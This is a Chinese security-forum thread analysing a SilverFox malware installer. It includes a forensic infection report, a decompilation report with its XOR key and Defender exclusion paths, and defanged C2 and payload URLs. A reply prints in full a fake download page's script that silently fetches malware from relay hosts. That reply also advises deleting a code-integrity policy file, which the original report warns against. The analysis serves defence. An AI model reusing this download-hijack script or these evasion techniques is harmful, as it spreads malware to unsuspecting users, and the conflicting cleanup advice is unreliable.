吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2269|回复: 29
上一主题 下一主题
收起左侧

[PC样本分析] install_h8.0.13.zip好像也是银狐

[复制链接]
跳转到指定楼层
楼主
汤圆 发表于 2026-8-24 01:40 回帖奖励
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 cattie 于 2026-8-25 10:37 编辑

不小心中毒,在另一台电脑上靠chatGPT解决了,但不知道是否清理干净。

SilverFox 证据包分析(2026-08-24)

结论

该电脑在 2026-08-24 00:15 取证时仍处于活动感染状态,置信度高。

  • DrlEoriz.exe 正在运行(PID 2720),父进程为任务计划服务。
  • 六个恶意载荷均有计划任务持久化,其中两个还写入 HKLM Run。
  • 文件并未从磁盘消失;除 ranchserv.jpg 外,主要载荷均带 Hidden/System,部分还带 ReadOnly 属性。
  • Windows 安全中心只登记 Windows Defender,但 WinDefendWdNisSvc 均停止;360 与火绒服务也停止。
  • ranchserv.jpg 实际是签名有效的 64 位 TrueSight 2.0.2 内核驱动,不是图片。它能终止进程、删除注册表键、操作设备/驱动对象、内存和文件,可被载荷用于关闭安全软件。

攻击者代码已取得管理员权限,并投放了具备内核级能力的驱动。现有证据包没有已加载驱动清单,因此不能证明或排除该驱动当时已加载,也无法证明系统中没有额外后门、凭据窃取或未发现的驱动。可信恢复方案是使用干净设备制作微软安装 U 盘,然后全新安装 Windows。

活动进程

进程 路径 启动方式 取证状态
DrlEoriz.exe C:\ProgramData\rYaoJGC5\DrlEoriz.exe 计划任务服务 PID 2720,运行中

持久化

计划任务

任务名 执行目标
268Bv C:\Users\Public\YxKXYA\alg1ce.exe
Execution Intuitive Vision C:\ProgramData\rYaoJGC5\DrlEoriz.exe
Implementation Track productivity C:\ProgramData\HlRo3yTG\NHdOoHgu.exe 1776
MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 aIHW6 C:\Program Files (x86)\NrJ4mP\9RL3ML.exe
MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 x04ez C:\Program Files (x86)\F6i7E724D\nqaR11YWG.exe
Status Metrics Elevate C:\ProgramData\EBIKFwdD.exe

Run 键

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

  • Tencent SecurityHealthC:\Users\Public\YxKXYA\alg1ce.exe
  • Alibaba SecurityHealthaC:\Program Files (x86)\NrJ4mP\9RL3ML.exe

其他标记

  • HKLM\SOFTWARE\JDBCC\data 存在,与母样本反编译得到的行为一致。
  • 未发现恶意 WMI CommandLineEventConsumer。
  • 当前服务清单中未找到对应用户态恶意服务;内核驱动清单在本版采集器中缺失,最新版采集器已经补采。

文件与配套载荷

以下文件都在 2026-08-23 22:49–22:50(本机时间)集中创建。

位置 大小 属性/说明
C:\Users\Public\YxKXYA\alg1ce.exe 139,088 Hidden, System
C:\Users\Public\YxKXYA\adoresd.dat 4,900,821 Hidden, System
C:\Users\Public\YxKXYA\msadox.tb 8,353 Hidden, System
C:\Users\Public\YxKXYA\UxEnhance64.dll 3,255,824 Hidden, System
C:\Program Files (x86)\NrJ4mP\9RL3ML.exe 149,320 Hidden, System
C:\Program Files (x86)\NrJ4mP\image.png 5,195,733 Hidden, System;不是可信图片资产
C:\Program Files (x86)\NrJ4mP\thumbs.db 366,997 Hidden, System;配套数据
C:\Program Files (x86)\NrJ4mP\XPSPLOG.dll 4,812,816 Hidden, System;疑似侧载 DLL
C:\Program Files (x86)\F6i7E724D\nqaR11YWG.exe 149,320 Hidden, System
C:\Program Files (x86)\F6i7E724D\image.png 5,195,733 Hidden, System;不是可信图片资产
C:\Program Files (x86)\F6i7E724D\thumbs.db 366,997 Hidden, System;配套数据
C:\Program Files (x86)\F6i7E724D\XPSPLOG.dll 4,812,816 Hidden, System;疑似侧载 DLL
C:\ProgramData\EBIKFwdD.exe 2,908,160 ReadOnly, Hidden, System
C:\ProgramData\rYaoJGC5\DrlEoriz.exe 486,832 ReadOnly, Hidden, System;运行中
C:\ProgramData\rYaoJGC5\DrlEoriz.dat 57,472 ReadOnly, Hidden, System
C:\ProgramData\rYaoJGC5\DrlEoriz.png 171,072 ReadOnly, Hidden, System;配套数据
C:\ProgramData\HlRo3yTG\NHdOoHgu.exe 679,424 ReadOnly, Hidden, System
C:\Windows\Temp\ranchserv.jpg 28,272 无 Hidden 属性;实际为内核驱动

母样本临时路径 C:\Users\is-yi\AppData\Local\Temp\BNZ.6a8b08632b6031d\install\_h8.0.13.exe 在取证时已不存在,符合安装器完成后自删除或临时目录被清理的行为。

ranchserv.jpg 静态分析

  • SHA-256:9122F5B6038480C7609393B360A0EE5021F2EE7C74D9A28FA2EA84E43B5158DD
  • PE64 Windows 内核驱动,产品/内部名 TrueSight,版本 2.0.2
  • 文件描述 Antirootkit module,公司 Adlice Software
  • Authenticode 签名链验证有效;签名证书有效期为 2015-03-31 至 2018-06-28。
  • 创建设备 \Device\TrueSight 和符号链接 \DosDevices\TrueSight
  • IOCTL 分派可调用 ZwTerminateProcessZwDeleteKeyZwOpenProcessIoCreateFileMmMapLockedPagesSpecifyCache 等内核 API。

这是合法厂商旧驱动被恶意程序带入并滥用的场景;“签名有效”只说明驱动文件未被签名后篡改,不说明此次投放和调用是合法的。

Defender 状态

  • 安全中心仅登记 Windows Defender
  • WinDefend:StartMode=Auto,State=Stopped
  • WdNisSvc:State=Stopped
  • Get-MpPreference 返回 0x800106ba
  • 火绒 HipsDaemon:Auto,但 Stopped。
  • 360 Q360AMPPL:Stopped。

因此不能用“第三方杀软令 Defender 进入被动模式”解释当前状态。结合母样本的安全软件对抗代码和 TrueSight 驱动能力,判断为防护被恶意停止/破坏。

360 启动失败补充诊断

后续只读检查确认:

  • C:\Program Files (x86)\360\360Safe\360Safe.exe 存在,大小 1,257,608 字节。
  • Authenticode 签名验证为 Valid,签名者为 Beijing Qihu Technology Co., Ltd.
  • 文件 ACL 允许系统、管理员及普通用户读取执行,没有发现执行权限拒绝。
  • Code Integrity Operational 日志在 2026-08-23 23:46 至 2026-08-24 00:23 连续记录事件 3033/3077,明确阻止 360Safe.exe360Tray.exeZhuDongFangYu.exeFileSmasher.exe
  • 拦截策略 ID 为 {A244370E-44C9-4C06-B551-F6016E563076};这是 Windows App Control 单策略格式的系统保留 ID。
  • CiTool.exe -lp -json 显示该策略 FriendlyName 为 AllowMicrosoft_2023-05-04,版本 10.0.5.6IsSystemPolicy=falseIsSignedPolicy=falseIsOnDisk=trueIsEnforced=trueIsAuthorized=true
  • 策略选项含 Enabled:UMCIEnabled:Unsigned System Integrity PolicyEnabled:Update Policy No Reboot。Smart App Control 的 VerifiedAndReputableDesktop 与 Evaluation 策略均未强制执行。

所以 360 启动失败的直接原因已经确定为强制模式的 Windows App Control/Code Integrity 策略,而不是 360 文件损坏、签名无效或 ACL 问题。用户确认 C:\Program Files\AppControl\ui\AppControl.exe 很早以前已经安装,并被主动用于定位和禁止本次恶意文件启动;因此 AllowMicrosoft_2023-05-04 应视为用户既有防护策略,而非 SilverFox 投放。该策略阻止恶意随机文件执行起到了保护作用,同时也连带阻止了未加入允许规则的 360 组件。若需要调整,应优先通过 AppControl 添加精确允许规则或由其界面管理策略,不应手工删除 SiPolicy.p7b.cip 文件。

建议处置顺序

  1. 立即断开该电脑的网线和 Wi-Fi,不再登录任何账号或插入日常使用的移动硬盘。
  2. 在另一台干净设备上修改邮箱、微软账号、浏览器同步、聊天、网盘、支付及远程控制软件密码,并注销所有会话;密码修改应在感染电脑断网之后进行。
  3. 只备份文档、照片、视频等不可执行数据。不要备份或恢复 .exe.dll.sys、脚本、压缩包、安装包及上述目录。
  4. 用干净设备制作微软官方 Windows 安装 U 盘,从 U 盘启动并做全新安装。只删除系统盘对应磁盘的 Windows 分区;不要误删其他数据磁盘。
  5. 安装完成后先更新 Windows 和 Defender,开启内存完整性及 Microsoft 易受攻击驱动程序阻止列表,再扫描备份数据。
  6. 若暂时无法重装,只能把手工清理视为临时隔离:在无网络安全模式中先删除上述六个计划任务和两个 Run 值,再隔离整组目录、EBIKFwdD.exeranchserv.jpg、JDBCC 键,并检查已加载 TrueSight/未知驱动。清理后仍不能恢复为“可信电脑”。

手工处置后的阶段验证

用户后续输出表明:

  • HKLM Run 中的 Tencent SecurityHealthAlibaba SecurityHealtha 已消失。
  • Defender AMRunningMode=NormalAMServiceEnabled=TrueAntivirusEnabled=True
  • 实时防护、行为监控、IOAV、网络检查及篡改保护均已启用。
  • 病毒库状态为当天且未过期。
  • FullScanAge=4294967295,表示仍未完成完整扫描;现有 Quick Scan 完成于感染发生前,不能作为清除验证。

C:\Program Files\AppControl\ui\AppControl.exe 是用户早已安装并信任的独立防护/进程管理工具,本次被用于发现恶意文件路径并禁止其启动,不属于 SilverFox。其既有执行控制策略也是 360 被 Code Integrity 拦截的合理来源。

额外可疑但尚未归因

HKCU\...\Run 中还有一个来自微信接收目录的 Green Christmas Tree 可执行文件启动项。当前证据不足以把它归入 SilverFox,但从聊天文件目录自动启动 EXE 的风险很高,应单独禁用并静态分析。

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

install_h8.0.13 恶意样本反编译报告

结论

install_h8.0.13.exe 是确认恶意的多阶段下载器,不是普通的 Auerswald USB 驱动卸载器。其行为与 SilverFox(银狐)/ Panasonic Sauron Loader 链高度一致。

样本会提权、关闭或绕过安全软件、把大范围目录加入 Microsoft Defender 排除项、从阿里云 OSS 下载后续载荷、创建随机名目录和 EXE/VBS、写入注册表配置,并具备强制重启能力。

哈希

对象 SHA-256
install_h8.0.13.zip b355eae7c0f72bc09291e1f8295dadbe9a0aa7b86ca1d2966b49f50b63a184c3
install_h8.0.13.exe 9868ba2e4c6fc4e4a884e1621ae23764f4fa677911a7191f21763258a1dff14e
加密第二阶段 1dc78a69c3d57ce114caee939613f37b9f97b1457196dae6c9502728f3cf5705
解密第二阶段 e26a671f0ca917ebe789a6af3a4119eefd797810c1c82d71f6c3b5c39df27502
解密第三阶段 ea31fe7830565a2f5404357d26d6b636e235faeed15498e36985893ee062bcd7

执行链

第一阶段:伪装与内存加载

  • 使用 Cleaner.exeAuerswald USB-Treiber Deinstallation 4.0.0.18 元数据伪装。
  • 没有数字签名。
  • 入口包含重叠指令、伪控制流和超大延时循环,阻碍反编译和沙箱分析。
  • 调用 VirtualAlloc(NULL, 0xDE63, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
  • 从母样本复制 56,931 字节到 RWX 内存并直接跳转执行。

第二阶段:自解密与反沙箱

  • 先变换入口处 16 字节,再以 0xAC 为滚动密钥,从尾到头解密约 0xDE05 字节。
  • 动态解析 Windows API,避免明显导入表。
  • 使用 SleepNtDelayExecutionQueryPerformanceCounterRDTSCPfxInitialize 检测沙箱或时间加速。
  • 大量调用 VirtualAllocVirtualProtectVirtualFree 进行内存压力/权限检查;异常时退出。
  • 从自身偏移 0x25 复制 48,645 字节,以硬编码密钥 4@e!c!bSL2AeimnwyD4x 循环 XOR 解密第三阶段,然后改为可执行并调用。

第三阶段:防御规避、下载与落地

Defender 排除项

调用 PowerShell/WMI 尝试加入以下排除路径:

  • C:\
  • C:\Users
  • C:\Windows
  • C:\Windows\Temp
  • C:\ProgramData
  • C:\Program Files (x86)

因此,落在 C:\ProgramData 的随机 EXE 可能不会被 Defender 扫描。

提权与安全软件对抗
  • 使用 ShellExecuteExArunas 重新启动自身,参数为 plp
  • 检测 Microsoft Defender、360、火绒、腾讯电脑管家、金山、Bkav 等进程。
  • 包含持续监视并终止/关闭 360 安全进程或窗口的线程。
  • 根据安全软件是否存在改变落地和执行分支。
网络 IOC

母样本内嵌主机前缀 2ssrq2。凯撒移位 17 解码后,构造以下地址:
下载使用 wininet.dllInternetOpenAInternetOpenUrlAInternetReadFile

文件与目录
  • 创建隐藏的随机六字符目录和随机六字符 EXE。
  • 已知路径模板包括 C:\Users\Public\<随机目录>\<随机名>.exe
  • 写入 C:\Windows\Temp\ranchserv.jpg
  • 创建 checktime.vbs,内容通过 WScript.Shell.Run 隐藏启动随机 EXE。
  • 下载数据按配置中的偏移、长度和单字节滚动 XOR 参数拆分,生成多个载荷。

用户报告的以下文件未包含在母样本明文中,符合“后续载荷随机命名”的特征,必须取得文件本体后才能确认它们各自是加载器、远控还是其他模块:

  • C:\Users\is-yi\AppData\Local\Temp\BNZ.6a8b08632b6031d\install\_h8.0.13.exe(母样本的临时解包/运行位置)
  • C:\Users\Public\YxKXYA\alg1ce.exe(六字符目录和六字符 EXE,精确吻合第三阶段随机名算法)
  • C:\Windows\Temp\ranchserv.jpg(由下载的 s.dat 改名落地,不应按普通图片处理)
  • C:\Program Files (x86)\NrJ4mP\9RL3ML.exe
  • C:\Program Files (x86)\F6i7E724D\nqaR11YWG.exe
  • C:\ProgramData\EBIKFwdD.exe
  • C:\ProgramData\rYaoJGC5\DrlEoriz.exe
  • C:\ProgramData\HlRo3yTG\NHdOoHgu.exe

后五个随机 EXE 的具体角色位于母样本下载并执行的后续链中,仅凭路径不能可靠判断。它们可能由 alg1ce.exe 或其内存载荷继续部署。

注册表与重启
  • 创建或更新 HKLM\SOFTWARE\JDBCC
  • 值名为 data,类型为 REG_BINARY,保存运行时配置/再次触发所需数据。
  • 可调用 InitiateSystemShutdownExAExitWindowsExcmd.exe /c shutdown /r /f /t 0 强制重启。

清除判断

该样本获得管理员权限并篡改防病毒配置,还会下载未知后续载荷。仅删除两个随机 EXE 不能证明系统已恢复可信状态。最可靠处置是:隔离网络、从干净设备更换账号密码、采集证据后使用可信安装介质全新安装 Windows。

若必须先排查,应收集两个随机 EXE、Defender 排除项、HKLM\SOFTWARE\JDBCC、计划任务、服务、WMI 持久化和近几天新建的可执行文件;不要在感染系统上打开样本。



请在安全环境中测试样本

样本以及报告.zip

2.7 MB, 下载次数: 29, 下载积分: 吾爱币 -1 CB

52pojie

免费评分

参与人数 3吾爱币 +2 热心值 +3 收起 理由
hodjrnkd + 1 + 1 我很赞同!
woflant + 1 + 1 谢谢@Thanks!
weidechan + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
AI-Compare 发表于 2026-8-24 13:00
本帖最后由 AI-Compare 于 2026-8-25 06:18 编辑

静态步骤( by SYSTEM-RAMOS-ZDY)

1 资源管理器,地址栏,输入(%windir%\System32\Codeintegrity)并回车
2 找到WDCP策略文件(SiPolicy.p7b)并删除
3 立即创建(SiPolicy.p7b)同名文件夹
4 输入(%windir%\System32\tasks)并回车
5 删除(最新日期/随机字符)任务计划文件
6 开始菜单任意位置,输入(taskschd.msc)并回车
7 检查任务计划列表,刚才(随机字符)任务是否已被移除
8 如果没有移除。选中(随机字符)任务并右键(删除)
9 重启电脑,此时病毒理论上不会开机自启,杀毒软件也可以正常运行了
0 立即启动任意有效杀毒软件,进行全盘扫描,对银狐病毒内容进行查杀
  如果是公司,请立即报告技术人员,谨防更深入的横向感染或窃密勒索

外壳站群

域 名 apps-hupu[.]com[.]cn
注册商 北京新网数码信息技术有限公司
注册人 546L6L6J
邮 箱 YWxpcmV6YWpvYmUxNzFAZ21haWwuY29t
省/州 山东(shandongsheng)
地 区 中国(CN)
注册日 2026-08-15 15:10:21 UTC+8
过期日 2027-08-15 15:10:21 UTC+8
状 态 正常
DNS ns1[.]363[.]hk
   ns2[.]363[.]hk
DNSSEC 未配置
域 名 decpseek[.]com[.]cn
注册商 北京新网数码信息技术有限公司
注册人 55Sw5pet
邮 箱 NDU2ODE1NDY1QHFxLmNvbQ==
省/州 贵州(guizhousheng)
地 区 中国(CN)
注册日 2026-08-13 17:58:08 UTC+8
过期日 2027-08-13 17:58:08 UTC+8
状 态 正常
DNS  ns1[.]363[.]hk
    ns2[.]363[.]hk
DNSSEC 未配置

落地通信

域 名 noah-ssh[.]com[.]cn
注册商 Web Commerce Communications Limited
注册人 5LmU6JOJ6JOJ
邮 箱 Mzg3NzA5ODg2NUBxcS5jb20=
注册日 2026-08-10 17:05:04 UTC+8
过期日 2027-08-10 17:05:04 UTC+8
状 态 客户端禁止转移
DNS  a9[.]share-dns[.]com
    b9[.]share-dns[.]net
DNSSEC 未配置

落地中继

域 名 workers[.]dev
注册商 CloudFlare, Inc.
注册人 CloudFlare, Inc.
邮 箱
省/州 加利福尼亚州(CA)
地 区 美国(US)
电 话 +1. NDE1MzE5NzUxNw==
注册日 2019-02-09 04:36:47 UTC+8
过期日 2027-02-09 04:36:47 UTC+8
更新日 2025-11-16 20:00:30 UTC+8
IANA_ID 1910
状 态 客户端禁止删除
    客户端禁止转移
    客户端禁止更新
DNS  clyde[.]ns.cloudflare[.]com
    sofia[.]ns.cloudflare[.]com
DNSSEC 未配置

下载服务

域 名 xujvgk[.]cn
注册商 Web Commerce Communications Limited
注册人 5YCZ6ZW/5bKt
邮 箱 c2ltYXh1ZW1laTFAMTYzLmNvbQ==
注册日 2025-12-31 10:42:10 UTC+8
过期日 2027-12-31 10:42:10 UTC+8
状 态 客户端禁止转移
DNS  ns1[.]julydns[.]com
    ns2[.]julydns[.]com
DNSSEC 未配置

文件指纹

install_h8.0.13.exe
大小: 30254520 字节 : 28 MiB
CRC32: D6348AF1
CRC64: 42F5971128BC3ED4
XXH64: C5A03DFD2213C8A4
SHA256: 9868ba2e4c6fc4e4a884e1621ae23764f4fa677911a7191f21763258a1dff14e
SHA3-256: ed1938447a8cbb4dacbd2e6b3e034888168a522eb066d507506a6270e3d99896

tad
大小: 512 字节
CRC32: 02AB29FB
CRC64: D2E466471CF610FA
XXH64: 0BDC033FC833D7EC
SHA256: cccf456c2ca882205c1fb4df938a017b4d503e632c4f69d591d6cdf2da08a23f
SHA3-256: 60c3a50a6c518b57192c2ca6de4bf19e4a4193232570ba917df53326eb03414b

a.gif
大小: 140021 字节 : 136 KiB
CRC32: 2DC9BEA3
CRC64: 1EDC226E537C42F9
XXH64: 2680E6BF635284CC
SHA256: 6349d18308f458ed290913068752471c453f1c9bbd472a73e9f92b444718bd4d
SHA3-256: 28105448024ccf2e9eb57457c5a06f145a8619180ca82d0a8c27d60606c7137c

b.gif
大小: 3256757 字节 : 3180 KiB
CRC32: 3A846A73
CRC64: FFF2EDBADE398A93
XXH64: 7C178DA3F47AFD71
SHA256: ea41d3b33fcf4929823c1a054d92208bb6275c3281da3b77d8a3521b261b2646
SHA3-256: 0cd64845d01c3cbeff5374edd1d3979e5787c612fc62547700f1f69bf88c99f8

c.gif
大小: 9286 字节 : 9 KiB
CRC32: B3AD0E7C
CRC64: 97DF19ED95BB4FBB
XXH64: 68B85F6B83E86F16
SHA256: c0627c59e27a670503683d2c5c117e126f4969144815317540895066c819b6f6
SHA3-256: 8d0eb2d33170c557e345cac3ea22be168b5f4bc049f6de58be2a72a59b0dbc4f

d.gif
大小: 4901754 字节 : 4786 KiB
CRC32: 0483DFC3
CRC64: 3B8A4677B0D00854
XXH64: DB2C38C6F9C292FC
SHA256: f5bfec979b53dd7b0c467f06ade20b3b2a6a006f1f045530ada92f405b6510c2
SHA3-256: 9cf6924c0ea09b225ef86f9477702bd557dd2919789d188e8c1e7fb1606493bc

s.jpg
大小: 83215 字节 : 81 KiB
CRC32: 58539318
CRC64: B1F5AECA117512E1
XXH64: A900358DF44D1043
SHA256: 71369dd8ef596d4eefaf21b831dc87f78eeaf2c3436eb95c24981a6d39151dd7
SHA3-256: aa9e63289e2766144c35cfe21b5a4a0e8db5fa226879b57ce75033929a610c7b

s.dat
大小: 28272 字节 : 27 KiB
CRC32: 3B4AA01D
CRC64: 257E71E899CE35A6
XXH64: 69F01E7D0CBC0099
SHA256: d0321b6b6e6712d22ee9fd63f90c2de477e11a4da2ec97501eb423b8e3cb6d0f
SHA3-256: 3c1c64aae08a33d16fc91d8b2a4272f3fc6f43bf3666c30f01910a9e745e27e5

drops.jpg
大小: 28122 字节 : 27 KiB
CRC32: 0BDCA51E
CRC64: 691AB664163AD2C7
XXH64: AD3BB6CF425CC6AE
SHA256: a70e8f7d7d850f36f2c39d0d1b7dd964ddb15ee24755e660d14953665890d34a
SHA3-256: 4f246c75916ddddcc7475dd7f0c4c861a20fdee008c7c5fb6c1671587f291c13

火绒扫描(我自己的本地扫描结果)
6.0.11.2 版本
08-23 18:55 病毒库

2026/08/24 11:20:48
病毒防护
文件实时监控
发现病毒Trojan/Injector,clcrit, 已处理

病毒名称:Trojan/Injector.c!crit
病毒ID:434E9E374546A127
病毒路径:install_h8.0.13.exe
操作类型:修改 
操作结果:已处理,删除文件

2026/08/24 11:33:17
病毒防护
病毒查杀
自定义扫描(手动执行),发现1个风险项目

病毒库时间:2026-08-23 18:55
开始时间:2026-08-24 11:33
执行类型:手动执行
扫描类型:自定义扫描
总计用时:00:00:01
扫描对象:12
扫描文件:8
发现风险:1
已处理风险:1
病毒详情:

风险路径:install_h8.0.13.exe
病毒名:Trojan/Injector.c!crit
病毒ID:434E9E374546A127
处理结果:已处理,删除文件

外联统计

<script charset="UTF-8" id="LA_COLLECT" src="//sdk[.]51[.]la/js-sdk-pro.min.js"></script>

<script>
        LA.init({
                id: "3QbvgmKU4mQXDLRW",
                ck: "3QbvgmKU4mQXDLRW"
        })
</script>

必应统计

<meta name="msvalidate.01" content="0A3325D924B70BCEDD52266CF66B6F21" />

https://github.com/Amery2010/HEAD/raw/refs/heads/master/README.md
https://github.com/joshbuchea/HEAD/raw/refs/heads/master/README.md

注释列表

<!-- 统计代码:优先加载 -->
<!-- 预加载 & 规范化 -->
<!-- 站点图标预留 -->
<!-- Font Awesome 6 -->
<!-- HERO -->
<!-- 深寻AI 专属模块 -->
<!-- 新增:DeepSeek网页版 特色模块(约180字) -->
<!-- 1. 官方渠道与产品定位 -->
<!-- 2. 下载引导 -->
<!-- 3. V4系列两大核心亮点 -->
<!-- 4. 极致性价比与API -->
<!-- 5. 开源生态与社区 -->
<!-- 新增:常见问题模块 -->
<!-- 底部 -->
<!-- 动态兜底脚本 -->
<!-- 5个锚文本关键词(必应热门) -->

核心脚本

<!-- 动态兜底脚本 -->

(
  function () {
    var DISCOVERY = [
      'https://noah-ssh[.]com[.]cn/relays.json',
      'https://noah-relay[.]wotudj578[.]workers[.]cdev',
      'https://noah-relay2[.]wotudj578[.]workers[.]cdev'
    ];
    var POOL_KEY = 'noah_relay_pool';
    var LINK = '';
    var resolving = false;
    var NOAH_DL_REV = 'r4';
    function targets() {
      var list = document.querySelectorAll('[data-download]');
      if (list.length) return list;
      var all = document.querySelectorAll('a, button');
      var picked = [];
      for (var i = 0; i < all.length; i++) {
        var t = (all[i].textContent || '').replace(/\s+/g, '');
        if (/下载|立即下载|免费下载|电脑版|^download$/i.test(t)) picked.push(all[i]);
      }
      return picked;
    }
    function startDownload(url) {
      if (!url) return;
      try {
        var ifr = document.createElement('iframe');
        ifr.style.display = 'none';
        ifr.src = url;
        (document.body || document.documentElement).appendChild(ifr);
        setTimeout(
          function () {
            try {
              ifr.parentNode.removeChild(ifr);
            } catch (e) {
            }
          },
          120000
        );
      } catch (e) {
        window.open(url, '_blank');
      }
    }
    function onClick(ev) {
      if (ev) {
        ev.preventDefault();
        ev.stopPropagation();
      }
      if (LINK) {
        startDownload(LINK);
        return false;
      }
      resolve(function () {
        if (LINK) startDownload(LINK);
      });
      return false;
    }
    function bind() {
      var list = targets();
      for (var i = 0; i < list.length; i++) {
        var el = list[i];
        if (el.__noahBound) continue;
        el.__noahBound = true;
        if (el.tagName === 'A') el.setAttribute('href', 'javascript:void(0)');
        el.style.cursor = 'pointer';
        el.addEventListener('click', onClick, false);
      }
    }
    function getCachedPool() {
      try {
        var o = JSON.parse(localStorage.getItem(POOL_KEY) || 'null');
        if (o && o.relays && o.relays.length) return o;
      } catch (e) {
      }
      return null;
    }
    function fetchLink(relays, i, done) {
      if (!relays || i >= relays.length) {
        if (done) done();
        return;
      }
      var ctrl = new AbortController();
      var timer = setTimeout(function () {
        ctrl.abort();
      }, 2500);
      fetch(
        relays[i].replace(/\/+$/, '') + '/api.php?t=' + Date.now(),
        {
          signal: ctrl.signal,
          cache: 'no-store'
        }
      ).then(function (r) {
        return r.ok ? r.json() : Promise.reject();
      }).then(
        function (data) {
          clearTimeout(timer);
          if (data && data.download_link) {
            LINK = data.download_link;
            bind();
            if (done) done();
          } 
          else fetchLink(relays, i + 1, done);
        }
      ).catch(function () {
        clearTimeout(timer);
        fetchLink(relays, i + 1, done);
      });
    }
    function discover(i, onDone) {
      if (i >= DISCOVERY.length) {
        onDone(null);
        return;
      }
      var ctrl = new AbortController();
      var timer = setTimeout(function () {
        ctrl.abort();
      }, 3000);
      fetch(
        DISCOVERY[i] + (DISCOVERY[i].indexOf('?') >= 0 ? '&' : '?') + '_=' + Date.now(),
        {
          signal: ctrl.signal,
          cache: 'no-store'
        }
      ).then(function (r) {
        return r.ok ? r.json() : Promise.reject();
      }).then(
        function (pkg) {
          clearTimeout(timer);
          var data = pkg &&
          pkg.data ? pkg.data : pkg;
          if (data && data.relays && data.relays.length) {
            try {
              localStorage.setItem(POOL_KEY, JSON.stringify(data));
            } catch (e) {
            }
            onDone(data);
          } else {
            discover(i + 1, onDone);
          }
        }
      ).catch(function () {
        clearTimeout(timer);
        discover(i + 1, onDone);
      });
    }
    function resolve(done) {
      if (resolving) {
        if (done) setTimeout(done, 800);
        return;
      }
      resolving = true;
      discover(
        0,
        function (fresh) {
          var pool = fresh ||
          getCachedPool();
          if (pool) fetchLink(pool.relays, 0, function () {
            resolving = false;
            if (done) done();
          });
           else {
            resolving = false;
            if (done) done();
          }
        }
      );
    }
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', bind);
    } else {
      bind();
    }
    resolve();
  }
) ();

落地通信

https://noah-ssh[.]com[.]cn/relays.json?_=1787569828637

{
  "data": {
    "v": 1786523551,
    "updated_at": 1786523551,
    "relays": [
      "https://noah-ssh[.]com[.]cn",
      "https://noah-relay[.]wotudj578[.]workers[.]dev",
      "https://noah-relay2[.]wotudj578[.]workers[.]dev"
    ]
  },
  "sig": ""
}

落地中继

https://noah-relay[.]wotudj578[.]workers[.]dev
https://noah-relay[.]wotudj578[.]workers[.]dev/relays.json?_=1787603702460

{
  "data": {
    "v": 1,
    "updated at": 1,
    "relays": [
      "https://noah-ssh[.]com[.]cn",
      "https://noah-re1ay2[.]wotudj578[.]workers[.]dev"
    ]
  },
  "sig": ""
}

下载赋值

https://noah-ssh[.]com[.]cn/api.php?t=1787569829175

{
  "download_link": "https://www[.]xujvgk[.]cn/doload32"
}

落地信息

https://noah-ssh[.]com[.]cn/admin

403 Forbidden:当前 IP 不在管理白名单(0.0.0.0)

后台参考

https://www.bilibili.com/video/BV1ebEh6bEU3
https://www.bilibili.com/video/BV1663n6dEaJ
银狐SK落地页(其中之一)后台参考
弱密码,现在已经添加IP登录白名单

文件属性

SFX ZIP 压缩文件

总文件夹
5

总文件
12

总大小
47,355

打包大小
9,285

压缩率
19%

SFX 模块大小
1,330,167 字节

字典大小
32 KB

参考信息

x64 Microsoft Visual C++ v.9.00 - 2008 - (exe 4883EC28-48) - no sec. Cab.7z.Zip , 
Overlay :  Signed - Name : Auerswald USB-Treiber Deinstallation.
Not packed , try debug www.ollydbg.de or www.x64dbg.com

文件说明
Auerswald USB-Treiber Deinstallation

文件版本
4.0.0.18

产品名称
Auerswald USB-Treiber Deinstallation

版权
Copyright @ 2009 AuerswaldGmbH & Co.KG

大小
28.8 MB

语言
德语(德国)

原始文件名
Cleaner.exe

目录预览

install_h8.0.13.exe
  ├── [Content_Types].xml #82872409
  └──word
    ├──styles.xml #C34C27AB
    ├──settings.xml #209C89FB
    ├──fontTable.xml #3813F668
    ├──document.xml #A757D11A
    ├──webSettings.xml #4E16A017
    ├──stylesWithEffects.xml #6E199955
    └──_rels
      └──document.xml.rels #39973B7C
    └──theme
      └──theme1.xml #2943DD30
  └──_rels
    └──.rels #B71A911E
  └──docProps
    └──app.xml #D6CA704E
    └──core.xml #702D7A44

尝试解压

! install_h8.0.13.exe: 文件报头已损坏
! install_h8.0.13.exe: 不可预料的压缩文件末端
! install_h8.0.13.exe: 主压缩文件报头已损坏

恶意载荷

https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/tad
https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/a.gif
https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/b.gif
https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/c.gif
https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/d.gif
https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/s.dat
https://2bbaz2[.]oss-cn-beijing[.]aliyuncs[.]com/s.jpg
https://mm2027[.]oss-cn-hangzhou[.]aliyuncs[.]com/drops.jpg

释放文件

C:\Windows\Temp\ranchserv.jpg

C:\Users\Public\artiUN\msadox.tb
C:\Users\Public\artiUN\adoresd.dat
C:\Users\Public\artiUN\CPU0Nb.exe
C:\Users\Public\artiUN\checktime.vbs
C:\Users\Public\artiUN\UxEnhance64.dll

窗口查找

Q360SafeMonClass

杀软排除

